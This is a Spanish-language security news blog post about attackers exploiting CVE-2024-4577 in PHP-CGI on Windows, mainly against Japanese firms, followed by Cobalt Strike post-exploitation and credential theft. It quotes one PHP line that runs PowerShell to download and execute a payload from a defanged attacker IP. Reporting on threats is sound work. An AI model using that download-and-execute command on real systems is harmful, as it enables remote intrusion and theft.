Tutoriales y Manuales
Entradas Mensuales
-
▼
2025
(Total:
324
)
-
▼
marzo
(Total:
47
)
-
La IA está facilitando los fraude de identificación
-
Los grupos de ransomware prefieren el "acceso repe...
-
Vulnerabilidad en PHP-CGI en Windows aprovechada p...
-
Tres vulnerabilidades activas en VMware
-
Extensión de VSCode contiene código malicioso
-
PowerToys permite convertir archivos multimedia
-
Microsoft desarrolla modelos de IA para competir c...
-
Redimensionar particiones con GParted
-
Cómo clonar tu SSD o disco duro con CloneZilla
-
Guía carriles (líneas) PCie
-
Una red de bots compromete más de 30.000 dispositi...
-
Radeon RX 9070 XTX en junio para competir con la G...
-
Google integra Gemini a Calendar para mejorar sus ...
-
Alarga la vida de tu viejo teléfono Android con Li...
-
Filtradas cuentas y datos bancarios de 80 mil mexi...
-
La china Alibaba lanza una IA que dice mejorar a D...
-
Generali sufre un ciberataque que afecta a los ex ...
-
Las mejores extensiones de Chrome para detectar im...
-
Precios recomendados tarjetas gráficas (GPU) de se...
-
El cofundador de Instagram predice que la IA reemp...
-
Tarjetas gráficas NVIDIA y AMD: Guía de equivalenc...
-
Chema Alonso abandona Telefónica
-
La filtración del grupo de ransomware desvela que ...
-
OnlyFans: menores venden videos explícitos aprovec...
-
Intel Core Ultra Serie 2: IA y potencia
-
Apple presenta el M3 Ultra, el nuevo chip de Apple...
-
Legálitas sufre una brecha de datos y filtra DNIs ...
-
El 99% de las organizaciones informan problemas de...
-
Apple presenta el nuevo MacBook Air con chip M4 y ...
-
Protección de Datos de España multa con 1 millón d...
-
Realme 14 Pro y 14 Pro+ llegan a España haciendo g...
-
Herramientas con interfaz web para Ollama (IA)
-
GPT-4.5 de OpenAI rompe récords en las pruebas de ...
-
Desarrollan baterías que convierten energía nuclea...
-
Amazon trabaja en una IA (Nova) de razonamiento pa...
-
LaLiga bloquea direcciones IP de CloudFlare y afec...
-
Spotify bloquea definitivamente las APK piratas: u...
-
Nothing desvela la nueva serie Phone (3a), con cám...
-
Filtrados 570 GB de datos sensibles de CCOO
-
Procesadores que no deberías comprar en 2025
-
360XSS: inyección masiva de anuncios a través de p...
-
Google Translate mejorará sus traducciones con IA
-
Caso Interfactura, el posible hackeo que pone en j...
-
APIs y contraseñas confidenciales utilizadas para ...
-
¿Qué es DeepSeek y cómo dar tus primeros pasos con...
-
DeepSeek lanza un sistema de archivos de código ab...
-
El Corte Inglés sufre un ciberataque que ha filtra...
-
-
▼
marzo
(Total:
47
)
-
►
2024
(Total:
1110
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Síguenos en:
Entradas populares
-
Chema Alonso ha anunciado que deja su puesto de Chief Digital Officer en Telefónica, tras casi una década con puestos de responsabilidad e... -
En plena temporada en la que millones de contribuyentes y empresas se preparan para presentar su declaración anual ante el SAT, el grupo de... -
Un fin de semana más, las operadoras han vuelto a ser protagonistas de numerosas críticas debido a los bloqueos de direcciones IP por orden ...
Vulnerabilidad en PHP-CGI en Windows aprovechada para infectar redes
Actores de amenazas de procedencia desconocida han sido atribuidos a una campaña maliciosa dirigida a instalaciones de PHP-CGI de PHP en Windows.
El atacante ha explotado la vulnerabilidad CVE-2024-4577, un fallo de ejecución de código remoto (RCE) en la implementación PHP-CGI de PHP en Windows, para obtener acceso inicial a las máquinas de las víctimas
Las versiones afectadas son < 8.3.8, < 8.2.20 y < 8.1.29.
Explotando la vulnerabilidad, se puede ejecutar código arbitrario en
servidores PHP remotos a través del ataque de inyección de argumentos.
Tras la
divulgación responsable el 7 de mayo de 2024 por parte de DEVCORE, se ha puesto a disposición una solución en las versiones 8.3.8, 8.2.20 y 8.1.29 de PHP. DEVCORE ha advertido que todas las instalaciones de XAMPP en Windows también son
vulnerables de forma predeterminada.
El investigador de Cisco Talos Chetan Raghuprasad dijo en un informe técnico publicado el jueves que "El atacante utiliza complementos del kit Cobalt Strike 'TaoWu' disponible públicamente para actividades de explotación posteriores".
<?php system ('powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString(\'http[://]38[.]14[.]255[.]23[:]8000/payload[.]ps1\')"');?>
Los objetivos de la actividad maliciosa abarcan empresas de los sectores de tecnología, telecomunicaciones, entretenimiento, educación y comercio electrónico, principalmente en Japón.
Todo comienza con los actores de amenazas que explotan la vulnerabilidad CVE-2024-4577 para obtener acceso inicial y ejecutar scripts de PowerShell para ejecutar la carga útil del shellcode HTTP inverso de Cobalt Strike TaoWu para otorgarse acceso remoto persistente al punto final comprometido.
El siguiente paso implica llevar a cabo tareas de reconocimiento, escalamiento de privilegios y desplazamiento lateral mediante herramientas como JuicyPotato, RottenPotato, SweetPotato, Fscan y Seatbelt. Se establece una persistencia adicional mediante modificaciones del Registro de Windows, tareas programadas y servicios personalizados mediante los complementos del kit Cobalt Strike llamado TaoWu.
"Para mantener el sigilo, borran los registros de eventos mediante comandos wevtutil, eliminando los rastros de sus acciones de los registros de seguridad, sistema y aplicaciones de Windows", señaló Raghuprasad. "Finalmente, ejecutan comandos Mimikatz para volcar y exfiltrar contraseñas y hashes NTLM de la memoria en la máquina de la víctima".
Los ataques culminan con el robo de contraseñas y hashes NTLM por parte de los delincuentes. Un análisis más detallado de los servidores de comando y control (C2) asociados con la herramienta Cobalt Strike ha revelado que el actor de la amenaza dejó los listados de directorios accesibles a través de Internet, exponiendo así el conjunto completo de herramientas y marcos de trabajo adversarios alojados en los servidores en la nube de Alibaba.
Entre las herramientas más destacadas se encuentran las siguientes:
- Browser Exploitation Framework (BeEF), un software de pruebas de penetración disponible públicamente para ejecutar comandos dentro del contexto del navegador.
- Viper C2, un framework modular que facilita la ejecución remota de comandos y la generación de cargas útiles de shell inverso de Meterpreter.
- Blue-Lotus, un framework de ataque de XSS y webshell de JavaScript.
Fuente: THN
Vïa:
https://blog.segu-info.com.ar/2025/03/vulnerabilidad-en-php-cgi-aprovechada.html
Etiquetas:
Entrada más reciente
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.